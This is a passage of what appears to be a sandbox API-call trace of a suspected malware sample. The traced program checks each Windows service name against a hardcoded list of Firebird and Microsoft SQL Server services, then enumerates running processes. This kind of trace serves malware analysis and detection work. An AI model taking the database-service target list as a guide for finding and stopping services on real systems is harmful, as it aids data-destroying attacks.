(lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0291.956] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0291.956] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0291.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0291.957] lstrlenW (lpString="DeviceAssociationService") returned 24 [0291.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0291.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0291.957] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0291.957] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0291.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0291.957] lstrlenW (lpString="Dhcp") returned 4 [0291.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0291.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0291.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0291.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0291.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0291.957] lstrlenW (lpString="Dnscache") returned 8 [0291.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0291.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0291.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0291.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0291.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0291.958] lstrlenW (lpString="DPS") returned 3 [0291.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0291.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0291.958] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0291.958] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0291.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0291.958] lstrlenW (lpString="DusmSvc") returned 7 [0291.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0291.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0291.958] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0291.958] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0291.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0291.959] lstrlenW (lpString="EventLog") returned 8 [0291.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0291.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0291.959] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0291.959] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0291.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0291.959] lstrlenW (lpString="EventSystem") returned 11 [0291.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0291.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0291.960] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0291.960] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0291.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0291.960] lstrlenW (lpString="FontCache") returned 9 [0291.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0291.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0291.960] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0291.960] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0291.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0291.960] lstrlenW (lpString="gpsvc") returned 5 [0291.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0291.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0291.960] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0291.960] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0291.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0291.960] lstrlenW (lpString="iphlpsvc") returned 8 [0291.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0291.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0291.961] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0291.961] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0291.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0291.961] lstrlenW (lpString="KeyIso") returned 6 [0291.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0291.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0291.961] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0291.961] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0291.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0291.961] lstrlenW (lpString="LanmanServer") returned 12 [0291.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0291.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0291.961] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0291.961] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0291.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0291.961] lstrlenW (lpString="LanmanWorkstation") returned 17 [0291.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0291.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0291.962] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0291.962] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0291.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0291.962] lstrlenW (lpString="lfsvc") returned 5 [0291.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0291.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0291.962] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0291.962] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0291.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0291.962] lstrlenW (lpString="lmhosts") returned 7 [0291.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0291.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0291.962] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0291.962] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0291.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0291.962] lstrlenW (lpString="LSM") returned 3 [0291.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0291.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0291.963] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0291.963] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0291.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0291.963] lstrlenW (lpString="MpsSvc") returned 6 [0291.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0291.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0291.963] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0291.963] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0291.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0291.963] lstrlenW (lpString="NcbService") returned 10 [0291.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0291.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0291.963] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0291.963] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0291.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0291.963] lstrlenW (lpString="netprofm") returned 8 [0291.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0291.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0291.964] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0291.964] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0291.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0291.964] lstrlenW (lpString="NgcSvc") returned 6 [0291.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0291.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0291.964] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0291.964] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0291.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0291.964] lstrlenW (lpString="NlaSvc") returned 6 [0291.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0291.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0291.964] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0291.964] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0291.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0291.964] lstrlenW (lpString="nsi") returned 3 [0291.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0291.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0291.965] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0291.965] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0291.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0291.965] lstrlenW (lpString="PcaSvc") returned 6 [0291.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0291.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0291.965] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0291.965] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0291.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0291.965] lstrlenW (lpString="PlugPlay") returned 8 [0291.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0291.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0291.965] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0291.965] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0291.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0291.966] lstrlenW (lpString="Power") returned 5 [0291.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0291.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0291.966] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0291.966] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0291.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0291.966] lstrlenW (lpString="ProfSvc") returned 7 [0291.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0291.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0291.966] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0291.966] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0291.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0291.966] lstrlenW (lpString="RpcEptMapper") returned 12 [0291.966] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0291.966] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0291.966] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0291.966] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0291.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0291.967] lstrlenW (lpString="RpcSs") returned 5 [0291.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0291.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0291.967] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0291.967] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0291.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0291.967] lstrlenW (lpString="SamSs") returned 5 [0291.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0291.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0291.967] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0291.967] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0291.967] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0291.967] lstrlenW (lpString="Schedule") returned 8 [0291.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0291.967] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0291.967] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0291.967] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0291.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0291.968] lstrlenW (lpString="SecurityHealthService") returned 21 [0291.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0291.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0291.968] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0291.968] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0291.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0291.968] lstrlenW (lpString="SENS") returned 4 [0291.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0291.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0291.968] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0291.968] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0291.968] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0291.968] lstrlenW (lpString="ShellHWDetection") returned 16 [0291.968] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0291.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0291.969] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0291.969] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0291.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0291.969] lstrlenW (lpString="Spooler") returned 7 [0291.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0291.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0291.969] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0291.969] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0291.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0291.969] lstrlenW (lpString="StateRepository") returned 15 [0291.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0291.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0291.969] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0291.969] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0291.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0291.969] lstrlenW (lpString="SysMain") returned 7 [0291.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0291.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0291.970] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0291.970] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0291.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0291.970] lstrlenW (lpString="SystemEventsBroker") returned 18 [0291.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0291.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0291.970] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0291.970] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0291.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0291.970] lstrlenW (lpString="Themes") returned 6 [0291.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0291.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0291.970] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0291.970] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0291.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0291.970] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0291.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0291.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0291.971] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0291.971] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0291.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0291.971] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0291.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0291.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0291.971] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0291.971] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0291.971] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4015d98 | out: hHeap=0x470000) returned 1 [0291.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x454 [0292.246] Process32FirstW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.247] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.248] lstrlenW (lpString="System") returned 6 [0292.248] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.248] lstrlenW (lpString="smss.exe") returned 8 [0292.248] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.249] lstrlenW (lpString="csrss.exe") returned 9 [0292.249] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.250] lstrlenW (lpString="wininit.exe") returned 11 [0292.250] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.250] lstrlenW (lpString="csrss.exe") returned 9 [0292.250] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.251] lstrlenW (lpString="winlogon.exe") returned 12 [0292.251] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.252] lstrlenW (lpString="services.exe") returned 12 [0292.252] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.252] lstrlenW (lpString="lsass.exe") returned 9 [0292.252] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0292.253] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0292.253] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0292.253] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0292.254] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.254] lstrlenW (lpString="svchost.exe") returned 11 [0292.254] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.255] lstrlenW (lpString="svchost.exe") returned 11 [0292.255] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.256] lstrlenW (lpString="dwm.exe") returned 7 [0292.256] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.256] lstrlenW (lpString="svchost.exe") returned 11 [0292.256] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.257] lstrlenW (lpString="svchost.exe") returned 11 [0292.257] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.257] lstrlenW (lpString="svchost.exe") returned 11 [0292.257] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.258] lstrlenW (lpString="svchost.exe") returned 11 [0292.258] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.258] lstrlenW (lpString="svchost.exe") returned 11 [0292.258] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, 